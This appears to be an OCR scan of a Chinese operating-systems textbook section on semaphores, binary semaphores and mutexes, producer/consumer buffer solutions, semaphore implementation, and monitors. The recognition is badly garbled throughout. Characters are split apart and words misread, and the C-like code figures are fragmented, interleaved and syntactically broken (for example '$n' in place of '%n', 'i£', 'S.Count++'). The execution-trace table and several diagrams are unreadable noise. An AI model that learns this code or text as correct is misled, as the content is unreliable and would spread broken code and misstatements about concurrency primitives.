足 。 为 了 发 信号 ， 需 要 使 用 一 个 称 做 信和 号 量 的 特殊 变量 。 为 通过 信号 量 s 传送 信和 号， 进程 可 执 
行 原 语 semSignal(s); 为 通过 信号 量 s 接收 信号 ， 进 程 可 执行 原 语 semwait(s); 如 果 相 应 
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的 信和 叶 仍 然 没 有 发 送 ， 则 进程 被 挂 起 ， 直 到 发 送 完 为 止 9 。 

为 达到 预期 的 效果 ， 可 把 信号 量 看 做 是 一 个 具有 整数 值 的 变量 ， 在 它 之 上 定义 三 个 操作 : 

1) 一 个 信号 量 可 以 初始 化 成 非 负 数 。 

2) semWait 操作 使 信号 量 减 1。 如 果 值 变 成 负数 ， 则 执行 semWait 的 进程 被 阻塞 。 否则 

进程 继续 执行 。 

3) semSignal 操作 使 信号 量 加 1。 如 果 值 小 于 或 者 等 于 零 ， 则 被 semwait 操作 阻塞 的 进 

程 被 解除 阻塞 。 
除了 这 三 种 操作 外 ， 没 有 任何 其 他 方法 可 以 检查 或 操作 信和 号 量 。 

我 们 对 这 三 种 操作 的 解释 如 下 : 开始 时 , 信和 号 量 的 值 为 零 或 正 数 。 如 果 该 值 为 正 数 ,， 则 该 值 
等 于 发 出 semWait 操作 后 可 立即 继续 执行 的 进程 的 数量 。 如 果 该 值 为 零 (或 者 由 于 初始 化 , 或 
者 由 于 有 等 于 信号 量 初 值 的 进程 已 经 等 待 )， 则 发 出 semwait 操作 的 下 一 个 进程 会 被 阻塞 ， 此 
时 该 信号 量 的 值 变 为 负 值 。 之 后 ， 每 个 后 续 的 semWwait 操作 都 会 使 信号 量 的 负 值 更 大 。 该 负 值 
等 于 正在 等 待 解除 阻塞 的 进程 的 数量 。 在 信号 量 为 负 值 的 情形 下 , 每 一 个 semSignal 操作 都 会 
将 等 待 进程 中 的 一 个 进程 解除 阻塞 。 

[DOWN07] 给 出 了 本 信号 量 定 义 的 三 个 有 意义 的 结论 : 

@ 通常 ， 在 进程 对 信号 量 减 1 之前， 无 法 提前 知道 该 信号 量 是 否 会 被 阻塞 。 

e 当 进 程 对 一 个 信号 量 加 1 之 后 ， 另 一 个 进程 会 被 唤醒 ,两 个 进程 继续 并 发 运行 。 而 在 一 

个 单 处 理 器 系统 中 ， 同 样 无 法 知道 哪 一 个 进程 会 立即 继续 运行 。 
@ 在 向 信号 量 发 出 信号 后 ， 不 需要 知道 是 否 有 另 一 个 进程 正在 等 待 ， 被 解除 阻塞 的 进程 数 
量 或 者 没有 或 者 是 1 个 。 

图 $.3 给 出 了 关于 信和 号 原 语 更 规范 的 定义 .semwait 和 semsignal 原 语 被 假设 是 原子 操作 。 
图 5.4 定义 了 称 为 二 元 信号 量 的 和 更 严格 的 形式 。 一 个 二 元 信和 号 量 的 值 只 能 是 0 或 1， 可 以 使 用 下 
面 三 种 操作 : 

struct semaphore { 


int count; 
queueType queue; 


struct binary semaphore { 
enum {zero, one} value; 
queueType queue; 

y: 

void semWaitB(binary_semaphore s) 


{ 


}; 
void semWait (semaphore s) 


{ 


if (s.value == one) 
s.value = zero; 

else { 
/* 把 当前 进程 插入 到 队列 当中 */，; 
/* 阻塞 当前 进程 */; 


s.count--; 

if (s.count < 0) { 
/* 把 当前 进程 插入 到 队列 当中 */，; 
/* 阻塞 当前 进程 */; 


} } 


} 


void semSignalB(semaphore s) 


{ 


} 


void semSignal (semaphore s) 


{ 


if (s.queue is empty()) 
s.value = one; 

else { 
/* 把 进程 p 从 等 待 队 列 中 移 除 */; 
/* 把 进程 插入 到 就 绪 队 列 */; 


S.Count++; 

i£ (s.count <= 0) { 
/* 把 进程 从 队列 当中 移 除 */; 
/* 把 进程 P 插 入 到 就 绪 队 列 */; 





图 5.3 ”信和 号 量 原 语 的 定义 图 5.4 二 元 信号 量 原 语 的 定义 


© 在 Dijkstra 最 初 的 论文 中 以 及 在 大 多 数 文献 中 , 字母 P 用 于 semwait， 字 母 V 用 于 semSignal; 它们 是 荷兰 语 中 
“proberen” ( 高 度 ) 和 “verhogen”( 增 量 ) 这 两 个 词 的 首 字 母 。 在 有 些 文献 中 ， 也 使 用 术语 wait 和 signal, 在 
本 书 中 ,为 清晰 起 见 ,以 及 避免 与 后 续 讨 论 的 管 程 中 的 wait 和 signal 操作 相 混淆 ,使 用 semWait 和 semsignal, 
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1) 一 个 二 元 信号 量 可 以 初始 化 成 0 或 i。 
2) semWaitB 操作 检查 信号 的 值 ， 如 果 值 为 0， 那么 进程 执行 semWaitB 就 会 受阻 。 如 果 
值 为 1， 那么 将 值 改 变 为 0， 并 且 继续 执行 该 进程 。 
3) semSignalB 操作 检查 是 否 有 任何 进程 在 该 信号 上 受阻 ， 如 果 有 ,那么 通过 semwaitB 
操作 ， 受 阻 的 进程 就 会 被 唤醒 ， 如 果 没 有 进程 受阻 ， 那 么 值 被 设置 为 1。 

理论 上 ,二 元 信和 号 量 更 易于 实现 ,并且 可 以 证 明 , 它 和 一 般 的 信和 号 具有 同样 的 表达 力 ( 见习 
题 5.17 )。 为 了 区 分 这 两 种 信号 ， 非 二 元 信号 常常 也 称 为 计数 信号 量 或 者 一 般 信 号 量 。 

与 二 元 信号 量 相关 的 一 个 概念 是 互 斥 量 。 两 者 的 关键 区 别 在 于 为 互 斥 量 加 锁 ( 设 定 其 值 为 0 ) 
的 进程 和 为 互 斥 量 解锁 ( 设 定 其 值 为 1 ) 的 进程 必须 是 同一 个 进程 。 相 比 之 下 ， 可 能 由 某 个 进程 
对 二 元 信号 量 进行 加 锁 操 作 ， 而 由 另 一 个 进程 为 其 解锁 e 。 

不 论 是 计数 信号 量 还 是 二 元 信和 号 量 , 都 需要 使 用 队列 来 保存 在 信号 量 上 等 待 的 进程 。 这 就 产 
生 了 一 个 问题 ; 进程 按照 什么 顺序 从 队列 中 移出 。 最 公平 的 策略 是 先进 先 出 (FIFO): 被 阻塞 时 
间 最 久 的 进程 最 先 从 队列 释放 。 采 用 这 个 策略 定义 的 信号 量 称 为 强 信号 量 ( strong semaphore ), 
没有 规定 进程 从 队列 中 移出 顺序 的 信号 量 称 为 弱 信 号 量 (weak semaphore). Al 5.5 基于 
[ DENN84 ], 是 一 个 关于 强 信和 号 量 操作 的 例子 。 这 里 进程 A、B 和 C 依赖 于 进程 D 的 结果 , 初始 
时 刻 (1)，A 正在 运行 , B、C 和 DD 就 绪 ， 信 号 量 为 1， 表 示 D 的 一 个 结果 可 用 。 当 A 执行 一 条 
semWait 指令 后 ， 信 号 量 减 为 0，A 能 继续 执行 ， 随 后 它 加 入 就 绪 队 列 。 然 后 在 时 刻 (2) HB 
正在 运行 , 最 终 执行 一 条 semwait 指令 , 并 被 挂 起 , 在 时 刻 (3 ) 时 DD 被 允许 运行 。 在 时 刻 (4 )， 
当 了 完成 一 个 新 结果 后 ， 它 执行 一 条 semsignal 指令 ， 人 允许 B 移 到 就 绪 队 列 中 。 在 时 刻 (5), 
D 加 入 就 绪 队 列 ，C 开始 运行 ， 当 它 执行 semWait 指令 时 被 挂 起 。 类 伏地， 在 时 刻 (6 )，A 和 
B 运行 , 且 被 挂 起 在 这 个 信号 量 上 , 允许 D 恢复 执行 。 当 D 有 一 个 结果 后 , 执行 一 条 semsignal 
指令 ， 把 C 移 到 就 绪 队 列 中 ， 随 后 的 D 循环 将 解除 A 和 B 的 挂 起 状态 。 

对 于 下 一 节 将 要 讲述 的 互 斥 算法 〈 如 图 5.6 所 示 )， 强 信号 量 保 证 不 会 饥饿 ， 而 弱 信号 量 不 
能 。 这 里 将 采用 强 信和 号 量 ， 因 为 它们 更 方便 ， 且 是 操作 系统 提供 的 典型 的 信号 量 形式 。 





就 绪 队 列 





“HEB 就 绪 队 列 HEWN EEE WAWI 
图 5.5 信和 号 量 机 制 的 一 个 例子 


O 在 一 些 文献 和 教材 中 ， 互 斥 量 和 二 元 信号 量 之 间 并 无 区 别 。 实 际 上 ， 很 多 操作 系统 都 提供 了 符合 本 书 定义 的 
互 斥 量 机 制 ， 如 Linux, Windows 和 Solaris. 
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5.3.1 HR 


图 5.6 给 出 了 一 种 使 用 信号 量 s 解决 互 斥 问 题 的 方法 (请 与 图 5.1 对 比 )。 RA n THE, 
用 数组 PORR ,所 有 的 进程 都 需要 访问 共享 资源 ,每 个 进程 中 进入 临界 区 前 执行 aemWait (s), 


WH s 的 值 为 负 ， 则 进程 被 挂 起 ; 如 果 值 为 1， 则 
s 被 减 为 0， 进程 立即 进入 临界 区 ; 由 于 s 不 再 为 
正 ， 因 而 其 他 任何 进程 都 不 能 进入 临界 区 。 

信和 号 量 一 般 初 始 化 为 1， 这 样 第 一 个 执行 
semWait 的 进程 可 以 立即 进入 临界 区 ， 并 把 sg 的 
值 置 为 0。 接着 任何 试图 进入 临界 区 的 其 他 进程 ， 
都 将 发 现 第 一 个 进程 忙 ， 因 此 被 阻塞 ,把 s HAE 


为 -1。 可 以 有 任意 数目 的 进程 试图 进入 ， 每 个 不 成 ， 


功 的 尝试 都 会 使 e 的 值 减少 1, 当 最 初 进 入 临界 区 
的 进程 离开 时 ，s 增加 1， 一 个 被 阻塞 的 进程 (如 
果 有 的 话 ) 被 移出 等 待 队列 ， 并 置 于 就 绪 状 态 。 这 
样 , 当 操 作 系 统 下 一 次 调度 时 , 它 可 以 进入 临界 区 。 

图 5.7 基于 [BACO03]， 显 示 了 三 个 进程 在 使 
用 了 图 5.6 所 示 的 互 斥 协议 后 , 一 种 可 能 的 执行 顺 








/* program mutualexclusion */ 
const int n = /* 进程 数 */; 
semaphore s = 1; 
void P(int i) 
{ 
while (true) { 
semWait (s); 
/* -临界 区 */; 
semSignal(s) ; 
/* 其 他 部 分 */; 
} 
} 


void main() 


{ 
parbegin (P(1), 


} 


P(2), os ty PY: 





图 5.6 使 用 信号 量 的 互 扩 


序 。 在 这 个 例子 中 ， 三 个 进程 (A、B、C ) 访问 一 个 受信 号 量 lock 保护 的 共享 资源 。 进 程 A 
执行 semWait (lock); 由 于 信号 量 在 本 次 semWait 操作 时 值 为 1， 因 而 A 可 以 立即 进入 临界 
区 ,并 把 信号 量 的 值 置 为 0;， 当 A 在 临界 区 时 ，B 和 C 都 执行 一 个 semWait 操作 并 被 阻塞 ; 4 
A 退出 临界 区 并 执行 semSignal (lock) iH, RA PRATHER B 现在 可 以 进入 临界 区 。 


信号 量 lock 队列 ”信和 号 量 lock 的 值 A B Cc 
| 72 : 

a eee sW |. J | 正常 执行 

E] 四 ! 阻塞 在 信和 号 
Sore en ae Se oe y A 1 Block 上 

回 | 
“repay Lae G eee. TE: E a = „Sem Waltgock) - 
ee NEA 人 同人 i 
ep ME somSignalock) -人 

| 四 注意 ; 正常 执行 可 以 
a eRe 8 a T IS ci a _-----| 2 semSignaliocs) 并行 ， 但 是 临界 区 代 

Ti 加 


| BAMBARA. 


57 ”进程 访问 受信 和 号 量 保护 的 共享 数据 


图 5.6 的 程序 也 可 以 很 好 地 解决 一 次 允许 多 个 进程 进入 临界 区 的 要 求 。 这 个 要 求 可 以 通过 把 
信号 量 初始 化 成 某 个 特定 值 来 达到 。 因 此 ， 在 任何 时 候 ，s.count 的 值 可 以 解释 如 下 : 
@ s.count>0: s.count 是 可 以 执行 semWait (sg) 而 不 被 挂 起 的 进程 数 (如 果 其 间 没 有 
semSignal (s) 被 执行 )。 这 种 情形 允许 信号 量 支持 同步 与 互 斥 。 
@ s.count<0; s.count 的 大 小 是 挂 起 在 s.queue 队列 中 的 进程 数 。 
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5.3.2 ”生产 者 /消费 者 问题 


现在 开始 分 析 并 发 处 理 中 最 常见 的 一 类 问题 : 生产 者 /消费 者 问题 。 通 常 可 描述 如 下 ; 有 一 
个 或 多 个 生产 者 生产 某 种 类 型 的 数据 ( 记录 、 字 符 )， 并 放置 在 缓冲 区 中 ; 有 一 个 消费 者 从 缓冲 
区 中 取 数 据 , 每 次 取 一 项 ; 系统 保证 避免 对 缓冲 区 的 重复 操作 ， 也 就 是 说 , 在 任何 时 候 只 有 一 个 
主体 (生产 者 或 消费 者 ) 可 以 访问 缓冲 区 。 问 题 是 要 确保 这 种 情况 ， 当 缓冲 区 已 满 时 ， 生 产 者 不 
会 继续 向 其 中 添加 数据 ; 当 缓冲 区 为 空 时 ,消费 者 不 会 从 中 移 走 数据 。 我 们 将 讨论 该 问题 的 多 种 
解决 方案 ， 以 证 明 信 号 量 的 能 力 和 缺陷 。 

.首先 假设 缓冲 区 是 无 限 的 ， 并 且 是 一 个 线性 的 元 素数 组 。 用 抽象 的 术语 ， 可 以 定义 如 下 的 生 
产 者 和 消费 者 函数 : 


producer: i: consumer: 
while(true) { while(true) { | 
/* produce item v */; while(in <= out) 
bin] = v; /* do nothing */; 
in++; w = bfout); 
} © out++; 


/* consume item w */; 


图 5.8 显示 了 缓冲 区 b 的 结构 。 生 产 者 可 以 按 自己 的 步调 产生 项 目 并 保存 在 缓冲 区 中 。 BK 
缓冲 区 中 的 索引 (in) 增加 1。 消 费 者 以 类 似 的 方法 继续 ， 但 必须 确保 它 不 会 从 一 个 空 的 缓冲 区 
中 读 取 数据 因此， 消费 者 在 开始 进行 之 前 应 该 确保 生产 者 已 经 生产 ( in>out )。 

现在 用 二 元 信号 量 来 实现 这 个 系统 ， 图 5.9 是 第 一 次 尝试 。 这 里 不 处 理 索 引 in 和 out, WE 
用 整 型 变量 n( =in-out ) 简单 地 记录 缓冲 区 中 数据 项 的 个 数 。 信 号 量 s 用 于 实施 互 斥 ， 信 和 号 量 
delay 用 于 迫使 消费 者 当 缓冲 区 为 空 时 等 待 (semwadit )。 


/* program producerconsumer */ 
int n; 


binary_semaphore s = 1, delay = 0; 
void producer() 


while (true) { 
produce (); 
semWaitB(s); 
append (); 
ntt; 
if (n==1) semSignalB(delay); 
semSignalB(s); 
} 


} 
void consumer() 


semWaitB(delay); 

while (true) { 
semWaitB(s); 
hg 


SonignalB(s); 
consume ( 

if (n==0) " semWaitB (delay); 
} 


} 
void main(} 
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图 5$.8 i ai 图 5.9 使 用 二 元 信号 量 解决 无 限 缓冲 区 生产 者 /消费 
者 问题 的 不 正确 方法 


, 这 种 方法 看 上 去 很 直观 。 生产 者 可 以 在 任何 时 人 和 由 地 往 缓 证 区 中 增加 数据 项 。 它 在 添加 数 
据 前 执行 semWaitB (s) ， 之 后 执行 semsignalB(s) ， 以 阻止 消费 者 或 任何 别 的 生产 者 在 添加 
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操作 过 程 中 访问 缓冲 区 。 同 时 ， 当 生产 者 在 临界 区 中 时 ， 将 的 值 增 1。 如 果 w=1， 则 在 本 次 添 
加 之 前 缓冲 区 是 空 的 ， 因 此 生产 者 执行 semsignalB (delay) 通知 消费 者 这 个 事实 。 消 费 者 在 
一 开始 时 就 使 用 semWaitB (delay) 等 待 生产 出 第 一 个 项 目 ， 然 后 它 在 自己 的 临界 区 中 取 到 这 
一 项 并 将 n 减 1。 如 果 生 产 者 总 能 够 保持 在 消费 者 之 前 工作 (一 种 普通 情况 )， 即 n 将 总 是 为 正 ， 
则 消费 者 很 少 会 被 阻塞 在 信号 量 delay 上 。 因 此 ， 生 产 者 和 消费 者 都 可 以 正常 运行 。 

但 是 这 个 程序 仍 有 缺陷 。 当 消费 者 消耗 尽 缓冲 区 中 的 项 时 ， 它 需要 重 置信 号 量 delay, A 
此 它 被 追 等 待 到 生产 者 往 缓冲 区 中 放 属 了 更 多 项 ， 这 正 是 语句 if n ==0 semwaitB (delay) 
的 目的 。 考 虚 表 5.4 中 列 出 的 情况 ， 在 第 14 行 消费 者 执行 semWaitB 操作 失败 。 但 是 消费 者 确 
实用 尽 了 缓冲 区 并 把 n 置 为 0 HST), 然而 生产 者 在 消费 者 测试 到 这 一 点 (第 14 行 ) 之 前 将 
nn 增加 i, 结果 导 致 semsignalB 和 前 面 的 semWaitB 不 匹配 。 第 20 行 的 的 值 为 -1， BAW 
费 者 已 经 消费 了 缓冲 区 中 不 存在 的 一 项 。 仅 把 消费 者 临界 区 中 的 条 件 语句 移出 也 不 能 解决 问题 ， 
因为 这 将 导致 死 锁 (例如 在 第 8 行 后 )。 


表 5.4 图 5.9 中 程序 的 可 能 情况 




















































ET EE 
Pee FE O 
i eee 
I N E a 
: ED NEEE AA 
9 | o 
| 
a nisome d o o a aa 
T Mer. ee 
13 semSignalB(s) CRETE dese: 1 
18 if(n==0)(semWaitB(delay)) Be ee ae 
19 semWaitB(s) ‘ao | Oo #8 


注 : 灰色 区 域 表示 由 信号 量 控制 的 临界 区 。 


解决 这 个 问题 的 方法 是 引入 一 个 辅助 变量 ,可 以 在 消费 者 的 临界 区 中 设置 这 个 变量 供 以 后 使 
用 ， 如 图 5.10 所 示 。 通 过 仔细 跟踪 这 个 逻辑 过 程 ， 可 以 确认 不 会 再 发 生死 锁 。 

如 果 使 用 一 般 信 号 量 (也 称 做 计数 信号 量 ) 可 以 得 到 一 种 更 清晰 的 解决 方法 ， 如 图 5.11 所 
示 。 变 量 n 为 信号 量 ， 它 的 值 等 于 缓冲 区 中 的 项 数 。 假 设 在 抄录 这 个 程序 时 发 生 了 错误 ， 操 作 
semSignal(s) fl semsignal (n) 被 互 换 ， 这 就 要 求生 产 者 在 临界 区 中 执行 semSignal (n) 
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操作 时 不 会 被 消费 者 或 另 一 个 生产 者 打 断 。 这 会 影响 程序 吗 ? 不 会 , 因为 无 论 任何 情况 ,消费 者 


在 继续 进行 之 前 必须 在 两 个 信号 量 上 等 待 。 


现在 假设 semWait (n) 和 semWait (s) 操作 偶然 被 颠倒 ， 这 时 会 产生 严重 的 甚至 是 致命 的 
错误 。 如 果 当 缓冲 区 为 空 (wn.count=0 ) 时 消费 者 曾经 进入 过 临界 区 ,那么 任何 一 个 生产 者 都 不 
能 继续 往 缓冲 区 中 添加 数据 项 , 系统 发 生死 锁 。 这 是 一 个 体现 信号 量 的 微妙 之 处 和 进行 正确 设计 


的 困难 之 处 的 较 好 示例 。 










/* program producerconsumer */ 
dat on; 

binary_semaphore s = 1, delay = 0; 
void producer () 






while (true) { 
produce () ; 
semWaitB(s) ; 
append () ; 
n++; 
if (n==1) semSignalB (delay); 
semSignalB(s) ; 









} 
} 


void consumer () 



















int m; /* 局 部 变量 */ 
semWaitB (delay) ; 
while (true) { 

semWaitB(s) ; 
take(); 


m = n; 

semSignalB(s); 

consume () ; 

if (m==0) semWaitB (delay) ; 


void main() 


n= 0; 
parbegin (producer, consumer) ; 


图 5.10 ”使 用 二 元 信和 号 量 解决 无 限 缓冲 区 生产 者 / 


消费 者 问题 的 正确 方法 








/* program producerconsumer */ 
P 


semaphore n = 0,s = 1; 
void producer () 
{ 
while (true) { 
produce (); 
semWaitB (s); 
append (); 
semSignal (s); 
semSignal (n); 
} 
} 
void consumer () 
{ 
while (true) { 
semWait (n); 
semWait (s); 
take (); 
semSignal (s); 
consume () ; 
} 
} 
void main() 
{ 


parbegin (producer, consumer) ; 


图 5.11 ”使 用 信号 量 解决 无 限 缓冲 区 生产 者 / 


消费 者 问题 的 方法 


最 后 ， 让 我 们 给 生产 者 /消费 者 问题 增加 一 个 新 的 实际 约束 ， 即 缓冲 区 是 有 限 的 。 缓 冲 区 被 
看 做 是 一 个 循环 存储 器 ， 如 图 5.12 所 示 ， 指 针 值 必 须 表 达 为 按 缓冲 区 的 大 小 取 模 ， 并 总 是 保持 


下 面 的 关系 : 


生产 者 ; 往 一 个 满 的 缓冲 区 中 插入 





消费 者 从 空 缓冲 区 中 移出 





S SE 


Out In 






In Out 
b) 


图 5.12 生产 者 /消费 者 问题 的 有 限 循环 缓冲 区 
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生产 者 和 消费 者 函数 可 以 表示 成 如 下 形式 ( 变量 in 和 our 初始 化 为 0, n 代表 缓冲 区 的 大 小 ); 


producer: consumer: 
while(true) { while(true) { 
/* produce item v */ while(in == out) 
while((in + 1) $n == out) /* do nothing */; 
/* do nothing */; w = blout]; 
bl[lin] = v; out = (out + 1) $n; 
in = (in + 1) %n; /* consume item w */; 


} } 

图 5.13 给 出 了 使 用 一 般 信 和 号 量 的 解决 方案 ， 其 中 增加 了 信和 号 量 e 来 记录 空闲 空间 的 数目 。 

使 用 信号 量 的 另外 一 个 例子 就 是 在 附录 A 中 描述 的 理发 店 问题 ， 附 录 A 还 包含 了 使 用 信和 号 
量 会 产生 竞争 的 例子 。 





/* program boundedbuffer */ 
const int sizeofbuffer = /* 缓冲 区 大 小 */; 


semaphore s = 1, n = 0, e = sizeofbuffer; 
void producer () 


while (true) { 
produce (); 
semWait (e); 
semWait (s); 
append (); 
semSignal (s); 
semSignal {n}; 





} 


void consumer () 
while (true) { 

semWait (n); 
semWait(s); 
take(); 
semSignal (s); 
semSignal (e); 
consume () ; 


} 


void main() 


{ 


parbegin (producer, consumer) ; 
} 
| 


图 5.13 ”使 用 信和 号 量 解决 有 限 缓 冲 区 生产 者 /消费 者 问题 的 方法 

5.3.3 信号 量 的 实现 

正如 前 面 所 提 到 过 的 ，semwait 和 semsignal 操作 必须 作为 原子 原 语 实现 。 一 种 显 而 易 
见 的 方法 是 用 硬件 或 固件 实现 ,如 果 没 有 这 些 方案 , 还 有 很 多 别 的 方案 。 问 题 的 本 质 是 互 斥 : 任 
何 时 候 只 有 一 个 进程 可 以 用 semWait 或 semSignal 操作 控制 一 个 信号 量 。 因 此 ， 可 以 使 用 任 
何 一 种 软件 方案 ， 如 Dekker 算法 或 Peterson 算法 ( 见 附录 A), 这 必然 伴随 着 处 理 开销 。 另 一 种 
选择 是 使 用 一 种 硬件 支持 实现 互 斥 的 方案 ， 例 如 ， 图 5.14a 显示 了 使 用 compare&swap 指令 的 实 
现 。 在 这 里 ， 信 号 量 是 如 图 5.3 中 的 结构 ,但 还 包括 一 个 新 的 整 型 分 量 .fag。 诚 然 ， 这 涉及 某 
种 形式 的 忙 等 待 ， 但 是 semsait 和 semSignal 操作 都 相对 较 短 ， 因 此 所 涉及 的 忙 等 待 时 间 量 
非常 小 。 

对 于 单 处 理 器 系统 ， 在 semWait 或 semSignal 操作 期 间 是 可 以 禁用 中 断 的 ， 如 图 5.14b 
所 示 。 这 些 操作 的 执行 时 间 相 对 很 得， 因此 这 种 方法 是 合理 的 。 
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.| semWait (s) semWait (s) 
禁用 中 断 ; 
5.count--; 
if (s.count < 0) { 


/* 该 进程 进入 s.queue 队列 */; 
/* 阻塞 该 进程 ， 并 允许 中 断 */; 


while (compare_and_swap(s.flag, 0 , 1) ss 1) 
/* 不 做 任何 事 */; 

s.count--; 

if (s.count < 0) { 
/* 该 进程 进入 s.queue 队列 */; 
/* 阻塞 该 进程 (也 必须 将 se.flag 设置 为 0) */; 





} 


else 


允许 中 断 ; 


} 
s.flag = 0; 
} 


semSignal (s) 


} 


semSignal (s)} 


禁用 中 断 ; 
&.count++; 
if (s.count «<= 0) { 


/* 从 s.queue 队列 中 移出 进程 */，; 
/* 进程 进入 就 绪 队 列 */; 


while (compare_and_swap(s.flag, 0 , 1) == 1) 
/* ABSENTEE * / ; 
s.count++4+; 


if (s.count <= 0) { 
/* 从 s.queue 队列 中 移出 进程 P */; 
/* 进程 进入 就 绪 队 列 */; 





} 
允许 中 断 ， 





a) 比较 并 交换 指令 b) 中 断 方式 
图 5.14 信号 量 的 两 种 可 能 的 实现 


5.4 Fe 


信和 号 量 为 实施 互 斥 以 及 进程 间 合 作 提供 了 一 种 原始 的 但 功能 强大 且 灵 活 的 工具 , 但 是 , 如 图 
5.9 所 示 ， 使 用 信号 量 设计 一 个 正确 的 程序 是 很 困难 的 ， 其 难点 在 于 semwait 和 semSignal 
操作 可 能 分 布 在 整个 程序 中 ， 却 很 难看 出 这 些 在 信号 量 上 的 操作 所 产生 的 整体 效果 。 

管 程 是 一 个 程序 设计 语言 结构 , 它 提 供 了 与 信号 量 同 样 的 功能 ,但 更 易于 控制 。 管 程 的 概念 
在 [HOAR74 ] 中 第 一 次 定义 ， 管 程 结构 在 很 多 程序 设计 语言 中 都 得 到 了 实现 , 包括 并 发 Pascal, 
Pascal-Plus, Modula-2, Modula-3 和 Java， 它 还 被 作为 一 个 程序 库 实 现 。 这 就 允许 程序 员 用 管 程 
锁定 任何 对 象 ， 特别 地 ,对 类 似 于 链表 之 类 的 对 象 ， 可 以 用 一 个 锁 锁 住 整个 链表 ,也 可 以 每 个 表 
用 一 个 锁 ， 还 可 以 为 表 中 的 每 个 元 素 用 一 个 锁 。 

我 们 从 Hoare 的 方案 开始 ， 然 后 再 对 它 进 行 改进 。 


5.4.1 使 用 信号 的 管 程 


管 程 是 由 一 个 或 多 个 过 程 、 一 个 初始 化 序列 和 局 部 数据 组 成 的 软件 模块 ， 其 主要 特点 如 下 : 

1) 局 部 数据 变量 只 能 被 管 程 的 过 程 访问 ， 任 何 外 部 过 程 都 不 能 访问 。 

2) 一 个 进程 通过 调用 管 程 的 一 个 过 程 进入 管 程 。 

3 ) 在 任何 时 候 ， 只 能 有 一 个 进程 在 管 程 中 执行 ， 调 用 管 程 的 任何 其 他 进程 都 被 阻塞 ， 以 等 

待 管 程 可 用 。 

前 两 个 特点 让 人 联想 到 面向 对 象 软 件 中 对 象 的 特点 。 的 确 , 面向 对 象 操作 系统 或 程序 设计 语 
言 可 以 很 容易 地 把 管 程 作为 一 种 具有 特殊 特征 的 对 象 来 实现 。 

通过 给 进程 强加 规定 , 管 程 可 以 提供 一 种 互 斥 机 制 : 管 程 中 的 数据 变量 每 次 只 能 被 一 个 进程 
访问 到 。 因 此 , 可 以 把 一 个 共享 数据 结构 放 在 管 程 中 ， 从 而 提供 对 它 的 保护 。 如 果 管 程 中 的 数据 
代表 某 些 资 源 ， 那 么 管 程 为 访问 这 些 资源 提供 了 互 斥 机 制 。 

为 进行 并 发 处 理 , 管 程 必须 包含 同步 工具 。 例 如, 假设 一 个 进程 调用 了 管 程 , 并 且 当 它 在 管 
程 中 时 必须 被 挂 起 ,直到 满足 某 些 条 件 。 这 就 需要 一 种 机 制 , 使 得 该 进程 不 仅 被 挂 起 , 而 且 能 释 
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放 这 个 管 程 ， 以 便 某 些 其 他 的 进程 可 以 进入 。 以 后 ， 当 条 件 满足 并 且 管 程 再 次 可 用 时 ， 需 要 恢复 
该 进程 并 允许 它 在 挂 起 点 重新 进入 管 程 。 

管 程 通过 使 用 条 件 变量 提供 对 同步 的 支持 , 这 些 条 件 变量 包含 在 管 程 中 , 并 且 只 有 在 管 程 中 
才能 被 访问 。 有 两 个 函数 可 以 操作 条 件 变量 ， 

@ cwait(c): 调用 进程 的 执行 在 条 件 c 上 挂 起 ， 管 程 现 在 可 被 另 一 个 进程 使 用 。 

© csignal(c): 恢复 执行 在 cwait 之 后 因为 某 些 条 件 而 挂 起 的 进程 。 如 果 有 多 个 这 样 的 

进程 ， 选 择 其 中 一 个 ; 如 果 没 有 这 样 的 进程 ， 什 么 也 不 做 。 

注意 管 程 的 wait 和 signa 操作 与 信号 量 不 同 。 如 果 在 管 程 中 的 一 个 进程 发 信号 ,但 没有 在 
这 个 条 件 变 量 上 等 待 的 任务 ， 则 丢弃 这 个 信号。 

图 5.15 给 出 了 一 个 管 程 的 结构 。 尽 管 一 个 进程 
可 以 通过 调用 管 程 的 任何 一 个 过 程 进 入 管 程 ， 但 我 
们 仍 可 以 把 管 程 想像 成 具有 一 个 人 口 点 ， 并 保证 一 
次 只 有 一 个 进程 可 以 进入 。 其 他 试图 进入 管 程 的 进 
程 被 阻塞 并 加 入 等 待 管 程 可 用 的 进程 队列 中 。 当 一 
个 进程 在 管 程 中 时 ， 它 可 能 会 通过 发 送 cwait (x) 
把 自己 暂时 阻塞 在 条 件 x 上 ， 随 后 它 被 放 入 等 待 条 
件 改变 以 重新 进入 管 程 的 进程 队列 中 ,在 cwait (x) 
调用 的 下 一 条 指令 开始 恢复 执行 。 

如 果 在 管 程 中 执行 的 一 个 进程 发 现 条 件 变量 x 
发 生 了 变化 ， 它 发 送 csignal (x), 通知 相应 的 条 
件 队 列 条 件 已 改变 。 

为 给 出 一 个 使 用 管 程 的 例子 ， 我 们 再 次 考虑 有 
界 缓冲 区 的 生产 者 /消费 者 问题 。 图 5.16 给 出 了 使 用 
管 程 的 一 种 解决 方案 。 管 程 模块 poundedbuffer 
控制 着 用 于 保存 和 取 回 字符 的 缓冲 区 ， 管 程 中 有 两 
个 条 件 变量 ( 使 用 结构 cond 声明 ):， 当 缓冲 区 中 至 
少 有 增加 一 个 字符 的 空间 时 ，notfull HH; 当 缓 冲 
区 中 至 少 有 一 个 字符 时 ，notempty 为 真 。 515 FEAH 

生产 者 可 以 通过 管 程 中 的 过 程 appena 往 缓冲 区 中 增加 字符 ， 它 不 能 直接 访问 buffers Kit 
程 首 先 检查 条 件 notfu11， 以 确定 缓冲 区 是 否 还 有 可 用 空间 。 如 果 没 有 , 执行 管 程 的 进程 在 这 个 条 
件 上 被 阻塞 。 其 他 某 个 进程 (生产 者 或 消费 者 ) 现在 可 以 进入 管 程 。 然 后 ， 当 缓冲 区 不 再 满 时 ， 
被 阻塞 进程 可 以 从 队列 中 移出 , 重新 被 激活 , 并 恢复 处 理 。 在 往 缓冲 区 中 放置 了 一 个 字符 后 ,该 
进程 发 送 notempty 条 件 信 号 。 对 消费 者 函数 也 可 以 进行 类 似 的 描述 。 

这 个 例子 指出 , 与 信号 量 相 比较 管 程 担负 的 责任 不 同 。 对 于 管 程 , 它 构造 了 自己 的 互 斥 机 制 : 
生产 者 和 消费 者 不 可 能 同时 访问 缓冲 区 ; 但 是 ， 程 序 员 必 须 把 适当 的 cwait 和 csignal 原 语 
RESET, 用 于 防止 进程 往 一 个 满 缓 冲 区 中 存放 数据 项 , 或 者 从 一 个 空 缓冲 区 中 取 数 据 项 。 而 
在 使 用 信号 量 的 情况 下 ， 执 行 互 斥 和 同步 都 属于 程序 员 的 责任 。 

